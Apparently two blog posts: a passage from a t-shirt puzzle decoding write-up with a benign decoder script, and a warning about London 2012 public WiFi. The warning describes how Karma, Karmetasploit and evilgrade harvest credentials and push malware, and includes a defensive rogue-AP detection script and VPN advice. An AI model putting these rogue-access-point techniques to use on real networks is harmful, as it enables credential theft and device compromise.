It’s at this point that I’ve hit a bit of a wall. I have no idea who this guy is, although he looks kind of like Art Garfunkel and now that’s all I can see when I look at it. The filename looks like it might be a clue, but again I do not recognise the name jlchal, or the initials JL if this is a challenge. It could refer to J.L Villar who has done some work in cryptography, however he does not look like this guy ;)

What do we have then?

I have drilled down the levels and ended up with an ASCII art picture of some guy I don’t recognise and a filename that may be a clue. If anyone has any suggestions then I’d love to hear them.
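The decoding chain walked through above (hex → ASCII → base64 → reversed URL, then base64 → a blob identified by its magic bytes → gunzip), as an added example that is not code from this post or from the challenge’s author. The shirt’s actual strings are not reproduced here, so the inputs are constructed placeholders (`PLACEHOLDER_URL`, and a gzip of a short sample text named `sample.txt`), and `identify` checks only a handful of magic numbers rather than the full table the `file` command uses.

```python
import base64
import binascii
import gzip
import io

# Constructed stand-in for the shirt's first block: the real string is not in
# the post, so a placeholder URL is reversed, base64-encoded and then
# hex-encoded in the same way the post describes. Its length is chosen so the
# base64 ends in "==", which is the 3d3d the shirt ends with.
PLACEHOLDER_URL = "http://example.invalid/shirt"
SHIRT_HEX = binascii.hexlify(
    base64.b64encode(PLACEHOLDER_URL[::-1].encode("ascii"))
).decode("ascii")

# A few well-known magic numbers; `file` consults a much larger table.
MAGIC_NUMBERS = [
    (b"\x1f\x8b", "gzip compressed data"),
    (b"BZh", "bzip2 compressed data"),
    (b"PK\x03\x04", "Zip archive data"),
    (b"\x7fELF", "ELF executable"),
    (b"%PDF", "PDF document"),
]


def hex_to_text(hex_string: str) -> str:
    """Hex digits (possibly wrapped across lines, as on the shirt) -> ASCII text."""
    return binascii.unhexlify("".join(hex_string.split())).decode("ascii")


def decode_first_block(hex_string: str) -> str:
    """hex -> base64 text -> bytes -> reversed string, i.e. the URL."""
    b64_text = hex_to_text(hex_string)
    return base64.b64decode(b64_text, validate=True).decode("ascii")[::-1]


def identify(blob: bytes) -> str:
    """Poor man's `file`: match the leading bytes against known magic numbers."""
    for magic, description in MAGIC_NUMBERS:
        if blob.startswith(magic):
            return description
    return "data"


def gzip_original_name(blob: bytes):
    """Read the FNAME field of a gzip header (the `was "..."` part of file's output)."""
    if not blob.startswith(b"\x1f\x8b") or len(blob) < 10:
        return None
    flags = blob[3]
    pos = 10                 # fixed header: id(2), method, flags, mtime(4), xfl, os
    if flags & 0x04:         # FEXTRA: 2-byte little-endian length + payload come first
        pos += 2 + int.from_bytes(blob[pos:pos + 2], "little")
    if not flags & 0x08:     # FNAME bit not set: no original name recorded
        return None
    end = blob.index(b"\x00", pos)
    return blob[pos:end].decode("latin-1")


def decode_second_block(b64_text: str):
    """base64 -> blob; if it is gzip, decompress it.

    Returns (description, original_name_or_None, payload_bytes).
    """
    blob = base64.b64decode("".join(b64_text.split()))
    description = identify(blob)
    if description.startswith("gzip"):
        with gzip.GzipFile(fileobj=io.BytesIO(blob)) as gz:
            return description, gzip_original_name(blob), gz.read()
    return description, None, blob


def build_sample_gzip_b64(text: str, filename: str) -> str:
    """Constructed stand-in for the second block: gzip some text, keeping its name."""
    buf = io.BytesIO()
    with gzip.GzipFile(filename=filename, mode="wb", fileobj=buf, mtime=0) as gz:
        gz.write(text.encode("ascii"))
    return base64.b64encode(buf.getvalue()).decode("ascii")


if __name__ == "__main__":
    print("first block  ->", decode_first_block(SHIRT_HEX))
    sample = build_sample_gzip_b64("  (o_o)\n  /|\\   constructed sample ASCII art\n", "sample.txt")
    kind, name, payload = decode_second_block(sample)
    print("second block ->", kind, "was", name)
    print(payload.decode("ascii"))
```

`gzip_original_name` reads the same header field that `file` reports as `was "jlchal.txt"`, which is where the filename clue in the post comes from.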

How about the last line?

The last line consists of

3d { print 0x$444 ); { iff beep }

I’m assuming the 3d belongs to this line, as if you add it to the block of text above it makes it invalid base64.

We have two executable blocks here, and this is where my lack of shell scripting is starting to be a problem. Print 0x should print a hex value, but the $ seems to indicate that it’s using an environment variable. The presence of the beep seems to indicate that it’s a bash environment but I cannot find the iff (if and only if) command anywhere inside bash.

So I didn’t get very far at all. Time for some more hacking to see if I can tease any more information out of it.


Twitter has informed me that JL is in fact @jameslyne, the creator of the challenge.


Why the London 2012 WiFi network will be a boon for information thieves

I was reading twitter the other day and came across a report on London getting blanketed by free WiFi coverage courtesy of O2 and this got me thinking. If I were a bad guy this would present me with such a very tasty target. Lots of tourists coming into the city for the Olympics with all of their laptops, smart phones and tablets. All of them not wanting to spend huge amounts on 3G roaming but thirsty for information and posting thousands of pics to Facebook and twitter. Of course they are going to take advantage of this free service, and so will the criminals.

If this service is to be offered free of charge then security will always take a back seat. After all, the information flowing over the network isn’t O2’s, is it? They aren’t going to give each user a certificate to authenticate to the AP, and they aren’t going to configure everyone’s device to verify the cert on the AP. I mean who are we kidding, they aren’t even going to implement WEP let alone WPA2. At best it will be a captive portal so they can grab some nice info to sell on to their advertising buddies.

So now you are in London, you’ve taken some photos, waved at the Queen and taunted the guards outside Buckingham Palace. You’re ready to drop it all on Facebook so your friends know just how much better you are than them. Time to connect to the free WiFi!

Open up your WiFi connection manager and there is “London Free WiFi from O2” [OPEN], sweet.

Select the AP and voilà, IP address obtained and I’m all ready to go.

Open up Internet Explorer and I get a nice O2 registration page where you can sign up for a free account or log on with an existing one. You put in your name, address, date of birth, mother’s maiden name, email address etc. and are issued a default password. You don’t bother changing this, you just want to get on Facebook.

Log into Facebook and post pics. Look at your friends posts and comment “lol”. Isn’t living in the future cool?

The above sounds like a plausible use case for most people in the city, and most of them won’t see anything wrong with it. After all, they had to put in a password, right, so it must be secure? Well, not so much. You see, while the tourist was sitting down with their latte to make their Facebook friends jealous, what was actually happening was this.

A criminal sets themselves up in a high traffic area of the city, probably near one of the sporting events. They fire up their laptop with an ALFA AWUS051NH wireless network adapter and 5dBi antenna. They will then fire up a copy of Karma. Now, Karma is a very generous piece of code. It will listen on the WiFi card and wait to hear other devices probing for access points. Usually when an AP receives a probe for an SSID that it doesn’t host it will simply ignore it, but Karma will answer all probes with a positive response and allow the client to connect to it. Karma will then act as the client’s access point and begin to handle its traffic. At this point Karma shows its generous nature again and will start answering requests for connections on a large number of protocols such as SMTP and FTP, using these connections to harvest the user’s credentials. If the criminal is being particularly evil they will be running Karmetasploit to automatically detect the software that you are using and start feeding you backdoors and exploits, joining you to their botnet and saving your machine to have more fun with later.

If the criminal is feeling generous he will connect himself to the legitimate WiFi and route your traffic onwards so you can actually surf, and he can steal even more credentials.
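A defensive check for the behaviour described above, as an added example that is not code from this post or from the Karma project. The tell-tale of a probe-answering rogue is that it claims to host whatever SSID a client asks for, so a client-side tool can probe for a randomly named SSID that no real network should have and refuse to associate with any access point that answers it, or that answers probes for several unrelated networks. The log format, the monitor that would produce it and the sample lines are all constructed for this illustration.

```python
import re
import secrets
from collections import defaultdict

# Constructed sample log in a hypothetical monitor format: time, frame type,
# BSSID (broadcast address for requests) and the SSID carried in the frame.
# 00:11:22:33:44:55 behaves like a normal AP; de:ad:be:ef:00:01 answers everything.
SAMPLE_LOG = """\
12:00:01 PROBE_REQ  ff:ff:ff:ff:ff:ff "London Free WiFi from O2"
12:00:01 PROBE_RESP 00:11:22:33:44:55 "London Free WiFi from O2"
12:00:01 PROBE_RESP de:ad:be:ef:00:01 "London Free WiFi from O2"
12:00:02 PROBE_REQ  ff:ff:ff:ff:ff:ff "HomeNet"
12:00:02 PROBE_RESP de:ad:be:ef:00:01 "HomeNet"
12:00:03 PROBE_REQ  ff:ff:ff:ff:ff:ff "CoffeeShop"
12:00:03 PROBE_RESP de:ad:be:ef:00:01 "CoffeeShop"
12:00:04 PROBE_REQ  ff:ff:ff:ff:ff:ff "canary-7f3a9c1e"
12:00:04 PROBE_RESP de:ad:be:ef:00:01 "canary-7f3a9c1e"
12:00:05 PROBE_RESP 00:11:22:33:44:55 "London Free WiFi from O2"
"""

# The canary that appears in the constructed log; make_canary_ssid() makes a fresh one.
SAMPLE_CANARY = "canary-7f3a9c1e"

LINE_RE = re.compile(
    r'^(?P<time>\S+)\s+(?P<kind>PROBE_REQ|PROBE_RESP)\s+'
    r'(?P<bssid>[0-9a-f]{2}(?::[0-9a-f]{2}){5})\s+"(?P<ssid>.*)"$'
)


def make_canary_ssid() -> str:
    """A random SSID that no legitimate network should be hosting."""
    return "canary-" + secrets.token_hex(4)


def parse_probe_responses(log_text: str) -> dict:
    """Map each responding BSSID to the set of SSIDs it has claimed to host."""
    claimed = defaultdict(set)
    for line in log_text.splitlines():
        match = LINE_RE.match(line.strip())
        if match is None or match["kind"] != "PROBE_RESP":
            continue
        claimed[match["bssid"]].add(match["ssid"])
    return dict(claimed)


def find_promiscuous_aps(log_text: str, canary_ssid: str, threshold: int = 3) -> dict:
    """Return {bssid: [reasons]} for APs that answered the canary or too many SSIDs."""
    findings = {}
    for bssid, ssids in parse_probe_responses(log_text).items():
        reasons = []
        if canary_ssid in ssids:
            reasons.append("answered a probe for the random canary SSID %r" % canary_ssid)
        if len(ssids) >= threshold:
            reasons.append("answered probes for %d different SSIDs" % len(ssids))
        if reasons:
            findings[bssid] = reasons
    return findings


def safe_to_associate(log_text: str, bssid: str, canary_ssid: str) -> bool:
    """Policy hook: only associate (and only then bring up the VPN) with an unflagged AP."""
    return bssid not in find_promiscuous_aps(log_text, canary_ssid)


if __name__ == "__main__":
    for bssid, reasons in find_promiscuous_aps(SAMPLE_LOG, SAMPLE_CANARY).items():
        print(bssid, "->", "; ".join(reasons))
```

The threshold of three distinct SSIDs is a starting point, not a rule: a legitimate multi-SSID AP (guest plus staff network) will answer two, so the canary response is the stronger signal and the count is a supporting one.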

So how do you get around this? Is there a way to use this service safely? If you want to give yourself a level of privacy while using a public network then your only real option is to connect via VPN to another trusted network and run all of your traffic through that. You are still exposed to having your credentials harvested between connecting to the network and establishing the VPN connection, but if you are careful and make sure there are no apps that are going to attempt to connect as soon as they have a valid network then you should be OK. Also, make sure your anti-virus is up to date, but DO THAT AT HOME! You will see why in a bit.

If your smart phone supports VPNs then it should be safe to use them as well; if not then either don’t use it, or use 3G. Check out OpenVPN to set up a service at your home that you can connect back to.

On the subject of software that will try to connect as soon as it gets a connection, it’s not just email apps that will do this. If you have Java, Acrobat, Flash or a host of other apps installed then they will attempt to connect back to their mothership and download updates. If our criminal is being very evil he will also be running evilgrade. Evilgrade is like Karma but for updates: it will intercept traffic and look for software calling home for updates. When it finds one it will intercept the connection and send the computer malware instead of the updates it was expecting. Welcome to the criminal’s botnet. The only defence is to make sure you are using a VPN, but you will still be exposed to attack before you have established the connection or if it drops out for any reason. This article gives some details on some third-party software you could use to help with this.

Everything that I have said above applies just the same to using any public network, but I contend that this combination of such a large public network with so many foreign tourists who will not want to use 3G due to costs makes this a golden opportunity for information thieves. So spread the word, make sure that your friends and family understand the risks, and as @j4vv4d would say, “Stay secure my friends”.